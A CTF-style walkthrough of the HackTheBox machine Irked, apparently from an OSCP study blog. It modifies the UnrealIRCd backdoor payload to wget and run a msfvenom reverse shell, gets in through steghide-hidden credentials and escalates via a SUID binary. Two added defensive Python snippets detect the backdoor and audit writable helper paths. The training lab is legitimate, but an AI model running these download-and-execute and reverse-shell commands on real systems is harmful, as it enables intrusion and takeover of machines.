Road to OSCP 10: Irked HackTheBox

Sharghaas
7 min read · Nov 21, 2021

Follow along my OSCP journey! This is my 10th target from the TJNULL’s OSCP list.

How to use this walkthrough?

To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!

Enumeration

I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you with a nice overview of the services scanned.

python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.117

Autorecon

While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt.

PORT    STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDGASnp9kH4PwWZHx/V3aJjxLzjpiqc2FOyppTFp7/JFKcB9otDhh5kWgSrVDVijdsK95KcsEKC/R+HJ9/P0KPdf4hDvjJXB1H3Th5/83gy/TEJTDJG16zXtyR9lPdBYg4n5hhfFWO1PxM9m41XlEuNgiSYOr+uuEeLxzJb6ccq0VMnSvBd88FGnwpEoH1JYZyyTnnbwtBrXSz1tR5ZocJXU4DmI9pzTNkGFT+Q/K6V/sdF73KmMecatgcprIENgmVSaiKh9mb+4vEfWLIe0yZ97c2EdzF5255BalP3xHFAY0jROiBnUDSDlxyWMIcSymZPuE1N6Tu8nQ/pXxKvUar
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFeZigS1PimiXXJSqDy2KTT4UEEphoLAk8/ftEXUq0ihDOFDrpgT0Y4vYgYPXboLlPBKBc0nVBmKD+6pvSwIEy8=
| 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC6m+0iYo68rwVQDYDejkVvsvg22D8MN+bNWMUEOWrhj
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 41338/tcp6 status
| 100024 1 56847/tcp status
| 100024 1 59927/udp status
|_ 100024 1 60062/udp6 status
6697/tcp open irc syn-ack ttl 63 UnrealIRCd
8067/tcp open irc syn-ack ttl 63 UnrealIRCd
56847/tcp open status syn-ack ttl 63 1 (RPC #100024)
65534/tcp open irc syn-ack ttl 63 UnrealIRCd

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s look at what is running on the webserver:

80 — Web

We tried to dirbust it and look for anything interesting, but it's just a simple picture. Nothing much we can do there.

UnrealIRC

We then look at the IRC daemon listening on the higher ports and see if there is anything interesting there.

Let's download the Perl script and look at it.

13853.pl

It seems we can pass the information about the host we are attacking as arguments. Don't forget to give the script executable permissions.

This usage output is quite interesting when you think of what it corresponds to in the script.

HINT

Why do you think nothing happened when I tried to execute it …

.

.

.

.

If you read the code that corresponds to the payloads, you'll realise that there is a bit of an issue: the payload fetches its bot from an external website, and the target cannot reach the outside network.

So to modify this, let’s host the reverse shell ourselves. First, we need to create it:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f elf > bot.elf

Now we can host it using updog, a handy HTTP server, and update the payload code.

updog -p 8000

And now we change the payload:

my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';

Changed to the following:

my $payload2 = 'AB; cd /tmp; wget http://10.10.16.2:8000/bot.elf -O bot; chmod +x bot; ./bot &';

Don’t forget to start your listener!

nc -nlvp 4444

Let's see if it works a bit better this time… and no luck. It seems the socket or the exploit isn't working. Since we didn't find anything on the web server, this still looks like our only way in.

Let's see if we can find different exploits for the same vulnerability online and compare.
We found one.

It looks quite similar, apart from some upgrades to the payloads and the execution. The part that interests me is the small ".encode()" that we see at the end.

According to the documentation found online, .encode() uses UTF-8 if no other encoding is specified, which avoids most encoding issues when sending the data over the socket.
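From the defender's side, the same trigger is easy to spot on the wire. The following is an added example, not code from the post or from either exploit: a small detector over constructed IRC lines that flags any line whose first two bytes are the UnrealIRCd backdoor trigger "AB" and notes download-and-execute indicators like those in the payload above. It works on bytes, which is the form the .encode() call produces and what a sensor actually captures.

```python
import re

# Constructed sample of what a sensor might capture on an IRC port.  These are
# bytes because that is what crosses the socket; the exploit's .encode() is
# what turns its str payload into exactly this form.
SAMPLE_IRC_LINES = [
    b"NICK sharghaas\r\n",
    b"USER s 8 * :s\r\n",
    b"AB; cd /tmp; wget http://10.10.16.2:8000/bot.elf -O bot; chmod +x bot; ./bot &\r\n",
    b"PRIVMSG #chan :AB; this is just an ordinary message\r\n",
    b"AB;id\r\n",
]

# Download-and-execute indicators, as in the payload above.
STAGE_RE = re.compile(r"\b(wget|curl)\b|chmod \+x|\./\S+ &|\| ?(ba)?sh\b")

def parse_irc_line(raw):
    # Decode leniently: attacker bytes need not be valid UTF-8, and a decode
    # error must never make the detector skip a line.
    return raw.decode("utf-8", errors="replace").rstrip("\r\n")

def find_backdoor_commands(lines):
    """Return (line_no, command, looks_like_staging) for every line whose first
    two bytes are the backdoor trigger 'AB'.  Only a leading 'AB' counts: the
    backdoored server keys on the start of the line, so 'AB;' inside a PRIVMSG
    is harmless and must not be flagged."""
    hits = []
    for n, raw in enumerate(lines, 1):
        text = parse_irc_line(raw)
        if text.startswith("AB"):
            cmd = text[2:].lstrip("; ")
            hits.append((n, cmd, bool(STAGE_RE.search(cmd))))
    return hits
```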

Let's try this exploit and see if we are a bit luckier.

Don’t forget to provide the information required for the reverse shell to reach us.

python3 exploit.py 10.10.10.117 6697 -payload python

Our listener seems to have received something.

Privilege escalation

Time for some shell upgrade 😉

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'
  2. Ctrl+Z
  3. stty raw -echo
  4. fg (nothing will show on the screen; just press Enter a couple of times after the command)

Enumeration

We start by getting some information on our user and checking if there is anything interesting in their home directory.

Going through the history doesn't give us much, but we do see that there is a backup in the following path:

/home/djmardov/Documents/

We can see the user flag, but we don’t have access yet.

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

That's really cool: we have a password to try out. We tried to use it to log in as the user, but that didn't work…

HINT

Super elite steg backup pw

What could this be referring to?

.

.

.

.

Hopefully you got it: steganography. The first place that comes to mind when thinking of where stegano could have been used is the picture on the web server. Let's see if there is something hidden inside.

There might be something in this image:

wget http://10.10.10.117/irked.jpg
steghide --info irked.jpg

Bingo! Using the password as the passphrase, we find the following.

Let’s extract it

steghide extract -sf irked.jpg
Kab6h+m+bbp2J:HG

Again, let's see if we can connect as the user!

Let’s go! Get the user flag and we can move to the last step of our challenge.

Let's SSH in as djmardov, now that we have the credentials, to get a stable shell.

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with a database password or even a user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)

Nothing of interest unfortunately, and oddly sudo isn't installed.

Enumeration scripts

This is where we upload our linpeas, LinEnum and Exploit Suggester.

On our attacking machine
We start updog, our simple Python HTTP server, in the folder where you keep all your privilege escalation scripts.

updog -p 8000

On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.

cd /tmp/
wget http://attacking_ip:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

There are a lot of interesting items in the linpeas output.

HINT

Linpeas specifically mentions one thing that is unknown to it.

.

.

.

.

Linpeas SUID

Let’s look at what that executable does

Ok, so it looks like a custom executable to view and test users' permissions. We can try to find out more by running strings against it.

It seems that the executable runs some system commands. We could imagine that the list of users comes from calling /tmp/listusers through the system function above. If that's the case, let's just create /tmp/listusers with bash inside.
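The weakness here is a privileged binary trusting a helper that lives in a world-writable directory. The following is an added example, not the box's binary or anything from the post: a small audit that pulls absolute paths out of a binary, the way strings does, and reports any whose target is missing or whose parent directory an unprivileged user can write to. The binary bytes and the filesystem model (FAKE_FS, fake_stat) are constructed so it runs offline; pass os.stat instead to check a real system.

```python
import os
import re
import stat
from collections import namedtuple

# Absolute paths embedded in a binary, like `strings viewuser | grep ^/`.
PATH_RE = re.compile(rb"/(?:[A-Za-z0-9_.+-]+/)*[A-Za-z0-9_.+-]+")

def extract_paths(blob):
    return sorted({m.decode() for m in PATH_RE.findall(blob)})

def writable_by_others(st):
    # Not root-owned or world-writable means an unprivileged user can change it; a
    # sticky /tmp (01777) still lets anyone *create* a missing file there.
    return st.st_uid != 0 or bool(st.st_mode & stat.S_IWOTH)

def audit_helper_paths(blob, statfn=os.stat):
    """Map each embedded path to the reasons a privileged caller must not trust it:
    a missing target, or an ancestor directory that unprivileged users can write."""
    findings = {}
    for path in extract_paths(blob):
        reasons = []
        try:
            statfn(path)
        except (FileNotFoundError, KeyError):   # KeyError: the dict model below
            reasons.append("target missing: whoever can write its directory creates it")
        d = os.path.dirname(path)
        while True:
            try:
                if writable_by_others(statfn(d)):
                    reasons.append(f"{d} is writable by unprivileged users")
            except (FileNotFoundError, KeyError):
                reasons.append(f"{d} does not exist")
            if d == "/":
                break
            d = os.path.dirname(d)
        if reasons:
            findings[path] = reasons
    return findings

# Constructed filesystem model standing in for os.stat on the target (uid, mode).
St = namedtuple("St", "st_uid st_mode")
FAKE_FS = {"/": St(0, stat.S_IFDIR | 0o755), "/tmp": St(0, stat.S_IFDIR | 0o1777),
           "/usr": St(0, stat.S_IFDIR | 0o755), "/usr/bin": St(0, stat.S_IFDIR | 0o755),
           "/usr/bin/id": St(0, stat.S_IFREG | 0o755)}
fake_stat = FAKE_FS.__getitem__

# Constructed stand-in for the bytes of a viewuser-like binary.
SAMPLE_BINARY = b"\x7fELF\x00viewuser\x00/usr/bin/id\x00/tmp/listusers\x00"
```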

Let’s go! Let’s get the root flag.

What did I learn?

  1. Basics of stegano with steghide.
  2. How to analyse an exploit, modify it and use it to exploit a vulnerability.
  3. How to analyse an executable with the SUID bit set to escalate privileges.

Stream

I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.


Sharghaas

Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together twitch.tv/sharghaas